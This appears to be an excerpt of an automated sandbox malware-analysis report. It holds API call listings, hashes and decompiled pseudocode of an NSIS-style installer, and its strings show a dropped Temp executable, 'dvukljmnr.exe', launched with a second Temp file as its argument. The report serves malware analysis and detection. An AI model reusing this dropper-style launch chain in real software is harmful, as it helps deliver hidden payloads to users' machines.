                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 0040485E
                                                          • LoadBitmapA.USER32 ref: 00404871
                                                          • SetWindowLongA.USER32(?,000000FC,00404DEF), ref: 0040488B
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040489F
                                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048B3
                                                          • SendMessageA.USER32 ref: 004048C8
                                                          • SendMessageA.USER32 ref: 004048D4
                                                          • SendMessageA.USER32 ref: 004048E6
                                                          • DeleteObject.GDI32(?), ref: 004048EB
                                                          • SendMessageA.USER32 ref: 00404916
                                                          • SendMessageA.USER32 ref: 00404922
                                                          • SendMessageA.USER32 ref: 004049B7
                                                          • SendMessageA.USER32 ref: 004049E2
                                                          • SendMessageA.USER32 ref: 004049F6
                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404A25
                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A33
                                                          • ShowWindow.USER32(?,00000005), ref: 00404A44
                                                          • SendMessageA.USER32 ref: 00404B47
                                                          • SendMessageA.USER32 ref: 00404BAC
                                                          • SendMessageA.USER32 ref: 00404BC1
                                                          • SendMessageA.USER32 ref: 00404BE5
                                                          • SendMessageA.USER32 ref: 00404C0B
                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404C20
                                                          • GlobalFree.KERNEL32(?), ref: 00404C30
                                                          • SendMessageA.USER32 ref: 00404CA0
                                                          • SendMessageA.USER32 ref: 00404D49
                                                          • SendMessageA.USER32 ref: 00404D58
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D78
                                                          • ShowWindow.USER32(?,00000000), ref: 00404DC6
                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404DD1
                                                          • ShowWindow.USER32(00000000), ref: 00404DD8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                          • String ID: $M$N
                                                          • API String ID: 1638840714-813528018
                                                          • Opcode ID: 7416ecd40991322695bfc66f84475ccc40ce6f5cb9d88326faa3f420c439a296
                                                          • Instruction ID: 4dc87105461fa9cd210088c80ac17c321b9292d6232489b395004e578f78c6e7
                                                          • Opcode Fuzzy Hash: 7416ecd40991322695bfc66f84475ccc40ce6f5cb9d88326faa3f420c439a296
                                                          • Instruction Fuzzy Hash: F0028EB0E00209AFDB20DF54DD45AAE7BB5EB84315F10817AF610BA2E1D7799A81CF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 64%
                                                          			E00404333(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                          				int _v8;
                                                          				signed int _v12;
                                                          				long _v16;
                                                          				long _v20;
                                                          				char _v24;
                                                          				long _v28;
                                                          				char _v32;
                                                          				intOrPtr _v36;
                                                          				long _v40;
                                                          				signed int _v44;
                                                          				CHAR* _v52;
                                                          				intOrPtr _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				CHAR* _v68;
                                                          				void _v72;
                                                          				char _v76;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr _t75;
                                                          				signed char* _t80;
                                                          				intOrPtr* _t81;
                                                          				int _t86;
                                                          				int _t88;
                                                          				int _t100;
                                                          				signed int _t105;
                                                          				char* _t110;
                                                          				intOrPtr _t113;
                                                          				intOrPtr* _t127;
                                                          				signed int _t139;
                                                          				signed int _t144;
                                                          				CHAR* _t150;
                                                          
                                                          				_t75 =  *0x41fd00;
                                                          				_v36 = _t75;
                                                          				_t150 = ( *(_t75 + 0x3c) << 0xa) + 0x424000;
                                                          				_v12 =  *((intOrPtr*)(_t75 + 0x38));
                                                          				if(_a8 == 0x40b) {
                                                          					E004053A6(0x3fb, _t150);
                                                          					E00405D03(_t150);
                                                          				}
                                                          				if(_a8 != 0x110) {
                                                          					L8:
                                                          					if(_a8 != 0x111) {
                                                          						L20:
                                                          						if(_a8 == 0x40f) {
                                                          							L22:
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_v12 = _v12 & 0x00000000;
                                                          							_t144 = _t143 | 0xffffffff;
                                                          							E004053A6(0x3fb, _t150);
                                                          							if(E004056C8(_t169, _t150) == 0) {
                                                          								_v8 = 1;
                                                          							}
                                                          							E00405AF4(0x41f4f8, _t150);
                                                          							_t80 = E0040567B(0x41f4f8);
                                                          							if(_t80 != 0) {
                                                          								 *_t80 =  *_t80 & 0x00000000;
                                                          							}
                                                          							_t81 = E00405DDA(0);
                                                          							if(_t81 == 0) {
                                                          								L29:
                                                          								_t86 = GetDiskFreeSpaceA(0x41f4f8,  &_v20,  &_v28,  &_v16,  &_v40);
                                                          								__eflags = _t86;
                                                          								if(_t86 == 0) {
                                                          									goto L32;
                                                          								}
                                                          								_t100 = _v20 * _v28;
                                                          								__eflags = _t100;
                                                          								_t144 = MulDiv(_t100, _v16, 0x400);
                                                          								goto L31;
                                                          							} else {
                                                          								_push( &_v32);
                                                          								_push( &_v24);
                                                          								_push( &_v44);
                                                          								_push(0x41f4f8);
                                                          								if( *_t81() == 0) {
                                                          									goto L29;
                                                          								}
                                                          								_t144 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                          								L31:
                                                          								_v12 = 1;
                                                          								L32:
                                                          								if(_t144 < E00404741(5)) {
                                                          									_v8 = 2;
                                                          								}
                                                          								if( *((intOrPtr*)( *0x4236fc + 0x10)) != 0) {
                                                          									E0040468C(0x3ff, 0xfffffffb, _t87);
                                                          									if(_v12 == 0) {
                                                          										SetDlgItemTextA(_a4, 0x400, 0x41f4e8);
                                                          									} else {
                                                          										E0040468C(0x400, 0xfffffffc, _t144);
                                                          									}
                                                          								}
                                                          								_t88 = _v8;
                                                          								 *0x423fc4 = _t88;
                                                          								if(_t88 == 0) {
                                                          									_v8 = E0040140B(7);
                                                          								}
                                                          								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
                                                          									_v8 = 0;
                                                          								}
                                                          								E00403F17(0 | _v8 == 0x00000000);
                                                          								if(_v8 == 0 &&  *0x42051c == 0) {
                                                          									E004042C8();
                                                          								}
                                                          								 *0x42051c = 0;
                                                          								goto L46;
                                                          							}
                                                          						}
                                                          						_t169 = _a8 - 0x405;
                                                          						if(_a8 != 0x405) {
                                                          							goto L46;
                                                          						}
                                                          						goto L22;
                                                          					}
                                                          					_t105 = _a12 & 0x0000ffff;
                                                          					if(_t105 != 0x3fb) {
                                                          						L12:
                                                          						if(_t105 == 0x3e9) {
                                                          							_t139 = 7;
                                                          							memset( &_v72, 0, _t139 << 2);
                                                          							_t143 = 0x420530;
                                                          							_v76 = _a4;
                                                          							_v68 = 0x420530;
                                                          							_v56 = E00404626;
                                                          							_v52 = _t150;
                                                          							_v64 = E00405B16(0x3fb, 0x420530, _t150);
                                                          							_t110 =  &_v76;
                                                          							_v60 = 0x41;
                                                          							__imp__SHBrowseForFolderA(_t110, 0x41f900, _v12);
                                                          							if(_t110 == 0) {
                                                          								_a8 = 0x40f;
                                                          							} else {
                                                          								__imp__CoTaskMemFree(_t110);
                                                          								E004055E7(_t150);
                                                          								_t113 =  *((intOrPtr*)( *0x423f28 + 0x11c));
                                                          								if(_t113 != 0 && _t150 == "C:\\Users\\Albus\\AppData\\Local\\Temp") {
                                                          									_push(_t113);
                                                          									_push(0);
                                                          									E00405B16(0x3fb, 0x420530, _t150);
                                                          									_t143 = 0x422ec0;
                                                          									if(lstrcmpiA(0x422ec0, 0x420530) != 0) {
                                                          										lstrcatA(_t150, 0x422ec0);
                                                          									}
                                                          								}
                                                          								 *0x42051c =  *0x42051c + 1;
                                                          								SetDlgItemTextA(_a4, 0x3fb, _t150);
                                                          							}
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          					if(_a12 >> 0x10 != 0x300) {
                                                          						goto L46;
                                                          					}
                                                          					_a8 = 0x40f;
                                                          					goto L12;
                                                          				} else {
                                                          					_t143 = GetDlgItem(_a4, 0x3fb);
                                                          					if(E00405654(_t150) != 0 && E0040567B(_t150) == 0) {
                                                          						E004055E7(_t150);
                                                          					}
                                                          					 *0x4236f8 = _a4;
                                                          					SetWindowTextA(_t143, _t150);
                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                          					_push(1);
                                                          					E00403EF5(_a4);
                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          					_push(0x14);
                                                          					E00403EF5(_a4);
                                                          					E00403F2A(_t143);
                                                          					_t127 = E00405DDA(7);
                                                          					if(_t127 == 0) {
                                                          						L46:
                                                          						return E00403F5C(_a8, _a12, _a16);
                                                          					}
                                                          					 *_t127(_t143, 1);
                                                          					goto L8;
                                                          				}
                                                          			}

                                                          APIs
                                                          • GetDlgItem.USER32(?,000003FB), ref: 0040437E
                                                          • SetWindowTextA.USER32(00000000,?), ref: 004043AA
                                                          • SHBrowseForFolderA.SHELL32(?,0041F900,?), ref: 0040445F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040446A
                                                          • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw,00420530,00000000,?,?), ref: 0040449C
                                                          • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw), ref: 004044A8
                                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044B8
                                                            • Part of subcall function 004053A6: GetDlgItemTextA.USER32 ref: 004053B9
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D5B
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D68
                                                            • Part of subcall function 00405D03: CharNextA.USER32(?), ref: 00405D6D
                                                            • Part of subcall function 00405D03: CharPrevA.USER32(?,?), ref: 00405D7D
                                                          • GetDiskFreeSpaceA.KERNEL32(0041F4F8,?,?,0000040F,?,00000000,0041F4F8,0041F4F8,?,?,000003FB,?), ref: 0040455B
                                                          • MulDiv.KERNEL32 ref: 00404571
                                                          • SetDlgItemTextA.USER32(00000000,00000400,0041F4E8), ref: 004045C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                          • API String ID: 2246997448-2645686078
                                                          • Opcode ID: cb80a268bf24ae7fe0fa1031d8768fc716fd5deb7f04e988c4d677ddd980eb03
                                                          • Instruction ID: 4b0f1e9708c527d2056c04b062cf11215df66417efe2c712fcd6d6fb4e9790ff
                                                          • Opcode Fuzzy Hash: cb80a268bf24ae7fe0fa1031d8768fc716fd5deb7f04e988c4d677ddd980eb03
                                                          • Instruction Fuzzy Hash: 7B817CB1900218BBDB11AFA1DC45A9F7BB8EF45314F00843AFA05B62D1D77C9A41CF69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E00402078(void* __eflags) {
                                                          				void* _t44;
                                                          				intOrPtr* _t48;
                                                          				intOrPtr* _t50;
                                                          				intOrPtr* _t52;
                                                          				intOrPtr* _t54;
                                                          				signed int _t58;
                                                          				intOrPtr* _t59;
                                                          				intOrPtr* _t62;
                                                          				intOrPtr* _t64;
                                                          				intOrPtr* _t66;
                                                          				intOrPtr* _t69;
                                                          				intOrPtr* _t71;
                                                          				int _t75;
                                                          				signed int _t81;
                                                          				intOrPtr* _t88;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t100;
                                                          
                                                          				 *(_t100 - 0x30) = E00402A85(0xfffffff0);
                                                          				_t96 = E00402A85(0xffffffdf);
                                                          				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A85(2);
                                                          				 *((intOrPtr*)(_t100 - 0x3c)) = E00402A85(0xffffffcd);
                                                          				 *((intOrPtr*)(_t100 - 0x34)) = E00402A85(0x45);
                                                          				if(E00405654(_t96) == 0) {
                                                          					E00402A85(0x21);
                                                          				}
                                                          				_t44 = _t100 + 8;
                                                          				__imp__CoCreateInstance(0x407380, _t75, 1, 0x407370, _t44);
                                                          				if(_t44 < _t75) {
                                                          					L12:
                                                          					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                          					_push(0xfffffff0);
                                                          				} else {
                                                          					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                          					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407390, _t100 - 8);
                                                          					if(_t95 >= _t75) {
                                                          						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                          						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                          						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                          						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\Albus\\AppData\\Local\\Temp");
                                                          						_t81 =  *(_t100 - 0x14);
                                                          						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                          						if(_t58 != 0) {
                                                          							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                          							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                          							_t81 =  *(_t100 - 0x14);
                                                          						}
                                                          						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                          						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                          						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x3c)))) != _t75) {
                                                          							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                          							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x3c)),  *(_t100 - 0x14) & 0x000000ff);
                                                          						}
                                                          						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                          						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                          						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                          						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x34)));
                                                          						if(_t95 >= _t75) {
                                                          							 *0x40a800 = _t75;
                                                          							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x40a800, 0x400);
                                                          							_t69 =  *((intOrPtr*)(_t100 - 8));
                                                          							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x40a800, 1);
                                                          						}
                                                          						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                          						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                          					}
                                                          					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                          					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                          					if(_t95 >= _t75) {
                                                          						_push(0xfffffff4);
                                                          					} else {
                                                          						goto L12;
                                                          					}
                                                          				}
                                                          				E00401423();
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t100 - 4));
                                                          				return 0;
                                                          			}






















                                                          APIs
                                                          • CoCreateInstance.OLE32(00407380,?,00000001,00407370,?), ref: 004020CB
                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,0040A800,00000400,?,00000001,00407370,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402187
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00402103
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                          • String ID: C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 123533781-2935972921
                                                          • Opcode ID: 99d1c9485c2385a05d6def83f54491c2fe2eae754645da680941b60363c3e806
                                                          • Instruction ID: 398a92e667fa01929b708865028928fdc90e398ffceaacaabec111818001f34d
                                                          • Opcode Fuzzy Hash: 99d1c9485c2385a05d6def83f54491c2fe2eae754645da680941b60363c3e806
                                                          • Instruction Fuzzy Hash: 96418E75A00204BFCB04EFA4CD88E9E7BB5EF89314B204169F905EB2D1CB799D41CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405DDA(signed int _a4) {
                                                          				struct HINSTANCE__* _t5;
                                                          				CHAR* _t7;
                                                          				signed int _t9;
                                                          
                                                          				_t9 = _a4 << 3;
                                                          				_t2 = _t9 + 0x409298; // 0x4b004178
                                                          				_t7 =  *_t2;
                                                          				_t5 = GetModuleHandleA(_t7);
                                                          				if(_t5 != 0) {
                                                          					L2:
                                                          					_t3 = _t9 + 0x40929c; // 0x454e5245
                                                          					return GetProcAddress(_t5,  *_t3);
                                                          				}
                                                          				_t5 = LoadLibraryA(_t7);
                                                          				if(_t5 != 0) {
                                                          					goto L2;
                                                          				}
                                                          				return _t5;
                                                          			}







                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(4B004178,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405DEC
                                                          • LoadLibraryA.KERNEL32(4B004178), ref: 00405DF7
                                                          • GetProcAddress.KERNEL32(00000000,454E5245,?,00000000,0040584D,00000001,?,00000000,?,?,004055D7,?,00000000,000000F1,?), ref: 00405E08
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID:
                                                          • API String ID: 310444273-0
                                                          • Opcode ID: 48fff7582a584f5b534c5f4fb96ac49351284891df118ff32f91dc10e886df39
                                                          • Instruction ID: 23adcdfa12f808958732e8448d219f11259a2274de98c66bb9e29e692012a426
                                                          • Opcode Fuzzy Hash: 48fff7582a584f5b534c5f4fb96ac49351284891df118ff32f91dc10e886df39
                                                          • Instruction Fuzzy Hash: 27E0C232A08510ABD7118B20ED48D6B73ADEF897403080C3EF549F6190C734ED91EBEA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 39%
                                                          			E004026A1(char __ebx, char* __edi, char* __esi) {
                                                          				void* _t19;
                                                          
                                                          				if(FindFirstFileA(E00402A85(2), _t19 - 0x194) != 0xffffffff) {
                                                          					E00405A52(__edi, _t6);
                                                          					_push(_t19 - 0x168);
                                                          					_push(__esi);
                                                          					E00405AF4();
                                                          				} else {
                                                          					 *__edi = __ebx;
                                                          					 *__esi = __ebx;
                                                          					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                          				}
                                                          				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t19 - 4));
                                                          				return 0;
                                                          			}





                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026B0
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: 13df6a17cce9b71cc0419ccd618343e2ee757eb231b356d374ab3b7a298b65eb
                                                          • Instruction ID: 8527613b08e3aea83d48894234c8ec001628bfbd33843c806f329a49b4271005
                                                          • Opcode Fuzzy Hash: 13df6a17cce9b71cc0419ccd618343e2ee757eb231b356d374ab3b7a298b65eb
                                                          • Instruction Fuzzy Hash: 5DF0A7726051009BD700EBA49E49AEF7768DF11314F60057BE141F20C1D6B84A42DB2A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E0040403D(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                          				char* _v8;
                                                          				signed int _v12;
                                                          				void* _v16;
                                                          				struct HWND__* _t52;
                                                          				long _t86;
                                                          				int _t98;
                                                          				struct HWND__* _t99;
                                                          				signed int _t100;
                                                          				intOrPtr _t109;
                                                          				int _t110;
                                                          				signed int* _t112;
                                                          				signed int _t113;
                                                          				char* _t114;
                                                          				CHAR* _t115;
                                                          
                                                          				if(_a8 != 0x110) {
                                                          					if(_a8 != 0x111) {
                                                          						L11:
                                                          						if(_a8 != 0x4e) {
                                                          							if(_a8 == 0x40b) {
                                                          								 *0x420510 =  *0x420510 + 1;
                                                          							}
                                                          							L25:
                                                          							_t110 = _a16;
                                                          							L26:
                                                          							return E00403F5C(_a8, _a12, _t110);
                                                          						}
                                                          						_t52 = GetDlgItem(_a4, 0x3e8);
                                                          						_t110 = _a16;
                                                          						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                          							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                          							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                          							_v12 = _t100;
                                                          							_v16 = _t109;
                                                          							_v8 = 0x422ec0;
                                                          							if(_t100 - _t109 < 0x800) {
                                                          								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                          								SetCursor(LoadCursorA(0, 0x7f02));
                                                          								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                          								SetCursor(LoadCursorA(0, 0x7f00));
                                                          								_t110 = _a16;
                                                          							}
                                                          						}
                                                          						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                          							goto L26;
                                                          						} else {
                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                          								SendMessageA( *0x423f24, 0x111, 1, 0);
                                                          							}
                                                          							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                          								SendMessageA( *0x423f24, 0x10, 0, 0);
                                                          							}
                                                          							return 1;
                                                          						}
                                                          					}
                                                          					if(_a12 >> 0x10 != 0 ||  *0x420510 != 0) {
                                                          						goto L25;
                                                          					} else {
                                                          						_t112 =  *0x41fd00 + 0x14;
                                                          						if(( *_t112 & 0x00000020) == 0) {
                                                          							goto L25;
                                                          						}
                                                          						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                          						E00403F17(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                          						E004042C8();
                                                          						goto L11;
                                                          					}
                                                          				}
                                                          				_t98 = _a16;
                                                          				_t113 =  *(_t98 + 0x30);
                                                          				if(_t113 < 0) {
                                                          					_t113 =  *( *0x4236fc - 4 + _t113 * 4);
                                                          				}
                                                          				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                          				_t114 = _t113 +  *0x423f58;
                                                          				_push(0x22);
                                                          				_a16 =  *_t114;
                                                          				_v12 = _v12 & 0x00000000;
                                                          				_t115 = _t114 + 1;
                                                          				_v16 = _t115;
                                                          				_v8 = E00404009;
                                                          				E00403EF5(_a4);
                                                          				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                          				_push(0x23);
                                                          				E00403EF5(_a4);
                                                          				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                          				E00403F17( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                          				_t99 = GetDlgItem(_a4, 0x3e8);
                                                          				E00403F2A(_t99);
                                                          				SendMessageA(_t99, 0x45b, 1, 0);
                                                          				_t86 =  *( *0x423f28 + 0x68);
                                                          				if(_t86 < 0) {
                                                          					_t86 = GetSysColor( ~_t86);
                                                          				}
                                                          				SendMessageA(_t99, 0x443, 0, _t86);
                                                          				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                          				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
                                                          				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                          				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                          				 *0x420510 =  *0x420510 & 0x00000000;
                                                          				return 0;
                                                          			}


















                                                          APIs
                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040C8
                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004040DC
                                                          • SendMessageA.USER32 ref: 004040FA
                                                          • GetSysColor.USER32 ref: 0040410B
                                                          • SendMessageA.USER32 ref: 0040411A
                                                          • SendMessageA.USER32 ref: 00404129
                                                          • lstrlenA.KERNEL32(?), ref: 00404133
                                                          • SendMessageA.USER32 ref: 00404141
                                                          • SendMessageA.USER32 ref: 00404150
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004041B3
                                                          • SendMessageA.USER32 ref: 004041B6
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041E1
                                                          • SendMessageA.USER32 ref: 00404221
                                                          • LoadCursorA.USER32 ref: 00404230
                                                          • SetCursor.USER32(00000000), ref: 00404239
                                                          • ShellExecuteA.SHELL32(0000070B,open,00422EC0,00000000,00000000,00000001), ref: 0040424C
                                                          • LoadCursorA.USER32 ref: 00404259
                                                          • SetCursor.USER32(00000000), ref: 0040425C
                                                          • SendMessageA.USER32 ref: 00404288
                                                          • SendMessageA.USER32 ref: 0040429C
                                                          Strings
